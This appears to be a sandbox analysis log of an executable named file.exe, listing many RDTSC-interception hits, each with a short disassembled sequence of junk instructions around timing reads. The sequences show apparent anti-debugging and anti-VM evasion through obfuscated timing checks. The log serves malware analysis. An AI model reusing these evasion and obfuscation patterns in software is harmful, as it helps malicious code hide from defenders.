Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAB5D9 second address: CAB5F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDAD0CA5E34h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBCC8A second address: CBCC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007FDAD10EAC36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF657 second address: CBF669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jne 00007FDAD0CA5E26h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC80B1 second address: CC80D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FDAD10EAC40h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC80D2 second address: CC8101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDAD0CA5E38h 0x0000000c jmp 00007FDAD0CA5E30h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8101 second address: CC8115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Ah 0x00000007 jns 00007FDAD10EAC36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEB77 second address: CCEB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEB7B second address: CCEB83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEB83 second address: CCEB8D instructions: 0x00000000 rdtsc 0x00000002 je 00007FDAD0CA5E2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD84F7 second address: CD84FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6E32 second address: CD6E38 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7357 second address: CD7362 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A085 second address: C199A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sbb edx, 493960A5h 0x0000000f lea eax, dword ptr [ebp+12489DC6h] 0x00000015 sub dword ptr [ebp+122D2287h], ecx 0x0000001b push eax 0x0000001c jmp 00007FDAD0CA5E37h 0x00000021 mov dword ptr [esp], eax 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D2ADAh], ebx 0x0000002b add dword ptr [ebp+122D248Ch], edi 0x00000031 popad 0x00000032 call dword ptr [ebp+122D286Eh] 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c pop edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD77F8 second address: CD77FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD77FC second address: CD7806 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDAD0CA5E26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDED81 second address: CDED87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDED87 second address: CDED8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDED8C second address: CDEDCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC48h 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDAD10EAC42h 0x00000014 jnc 00007FDAD10EAC3Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEEF98 second address: CEEFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEEFA2 second address: CEEFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEEFA8 second address: CEEFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jo 00007FDAD0CA5E26h 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEEFBB second address: CEF006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Dh 0x00000007 jmp 00007FDAD10EAC42h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FDAD10EAC49h 0x00000017 jmp 00007FDAD10EAC43h 0x0000001c pushad 0x0000001d jl 00007FDAD10EAC36h 0x00000023 push edi 0x00000024 pop edi 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF006 second address: CEF01A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFBA2A second address: CFBA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD10EAC3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFBA3C second address: CFBA59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFBA59 second address: CFBA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE380 second address: CFE38C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FDAD0CA5E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE38C second address: CFE3B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDAD10EAC44h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D005BC second address: D005C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D005C0 second address: D005D0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDAD10EAC36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D005D0 second address: D005DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD0CA5E2Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D182E5 second address: D182EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D182EB second address: D182EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1711E second address: D17126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17126 second address: D1712D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17570 second address: D17574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D176F0 second address: D176F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17AD7 second address: D17B0E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDAD10EAC3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jo 00007FDAD10EAC36h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b jmp 00007FDAD10EAC46h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17B0E second address: D17B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17B12 second address: D17B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17E20 second address: D17E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17E26 second address: D17E30 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDAD10EAC36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17FB4 second address: D17FC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17FC3 second address: D17FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1AF39 second address: D1AF54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C5AD second address: D1C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E21B second address: D1E21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E21F second address: D1E225 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0DE5 second address: 48C0E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FDAD0CA5E4Eh 0x0000000f jmp 00007FDAD0CA5E36h 0x00000014 add eax, ecx 0x00000016 jmp 00007FDAD0CA5E30h 0x0000001b mov eax, dword ptr [eax+00000860h] 0x00000021 pushad 0x00000022 push esi 0x00000023 pushad 0x00000024 popad 0x00000025 pop ebx 0x00000026 popad 0x00000027 test eax, eax 0x00000029 jmp 00007FDAD0CA5E35h 0x0000002e je 00007FDB42D1BD3Ch 0x00000034 jmp 00007FDAD0CA5E2Eh 0x00000039 test byte ptr [eax+04h], 00000005h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FDAD0CA5E37h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E7A second address: 48C0E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E80 second address: 48C0E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33C49 second address: C33C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FDAD10EAC44h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3407F second address: C34091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FDAD0CA5E26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34091 second address: C340AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0411 second address: 48E0446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FDAD0CA5E30h 0x0000000b or si, 0188h 0x00000010 jmp 00007FDAD0CA5E2Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push ebx 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0446 second address: 48E045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 0CEFh 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ecx, dword ptr [ebp+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 9Eh 0x00000014 mov cl, CAh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D05FC second address: 48D0600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0600 second address: 48D0606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0606 second address: 48D060C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D060C second address: 48D0610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0610 second address: 48D061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D061F second address: 48D0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0623 second address: 48D0629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0629 second address: 48D0638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0638 second address: 48D06EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, 4BA2h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FDAD0CA5E39h 0x00000018 xor ch, 00000076h 0x0000001b jmp 00007FDAD0CA5E31h 0x00000020 popfd 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDAD0CA5E39h 0x0000002f adc esi, 12AA8186h 0x00000035 jmp 00007FDAD0CA5E31h 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FDAD0CA5E30h 0x00000041 sbb ax, 6428h 0x00000046 jmp 00007FDAD0CA5E2Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D06EA second address: 48D077C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDAD10EAC3Fh 0x00000008 pop ecx 0x00000009 call 00007FDAD10EAC49h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 jmp 00007FDAD10EAC47h 0x00000019 xchg eax, ecx 0x0000001a jmp 00007FDAD10EAC46h 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FDAD10EAC41h 0x00000027 adc si, BDB6h 0x0000002c jmp 00007FDAD10EAC41h 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 mov ecx, 45FB57FDh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D077C second address: 48D07A3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDAD0CA5E2Ah 0x00000008 xor ecx, 252170D8h 0x0000000e jmp 00007FDAD0CA5E2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D07A3 second address: 48D0823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov dh, ch 0x0000000d mov ax, di 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FDAD10EAC42h 0x00000019 xor ecx, 059FB598h 0x0000001f jmp 00007FDAD10EAC3Bh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FDAD10EAC48h 0x0000002b xor ax, DFF8h 0x00000030 jmp 00007FDAD10EAC3Bh 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FDAD10EAC45h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0823 second address: 48D0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0829 second address: 48D082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D082D second address: 48D083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D083E second address: 48D0842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0842 second address: 48D0848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0848 second address: 48D084E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D084E second address: 48D0852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0852 second address: 48D0888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FDAD10EAC43h 0x00000014 pop eax 0x00000015 push edx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D09A2 second address: 48D09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D09A8 second address: 48D0A37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDAD10EAC3Ah 0x00000009 add si, 1218h 0x0000000e jmp 00007FDAD10EAC3Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FDAD10EAC48h 0x0000001a and cx, 7C78h 0x0000001f jmp 00007FDAD10EAC3Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 cmp dword ptr [ebp-04h], 00000000h 0x0000002c pushad 0x0000002d pushad 0x0000002e mov edx, esi 0x00000030 pushfd 0x00000031 jmp 00007FDAD10EAC3Eh 0x00000036 xor esi, 70A096D8h 0x0000003c jmp 00007FDAD10EAC3Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov bx, si 0x00000046 popad 0x00000047 mov esi, eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FDAD10EAC41h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0A37 second address: 48D0A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0008 second address: 48D001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push esp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov di, CB8Eh 0x0000000e mov ax, di 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D001A second address: 48D0037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 call 00007FDAD0CA5E2Ah 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0037 second address: 48D003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D003B second address: 48D0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0055 second address: 48D0095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FDAD10EAC3Bh 0x00000014 and ch, FFFFFFFEh 0x00000017 jmp 00007FDAD10EAC49h 0x0000001c popfd 0x0000001d mov ah, BFh 0x0000001f popad 0x00000020 rdtsc
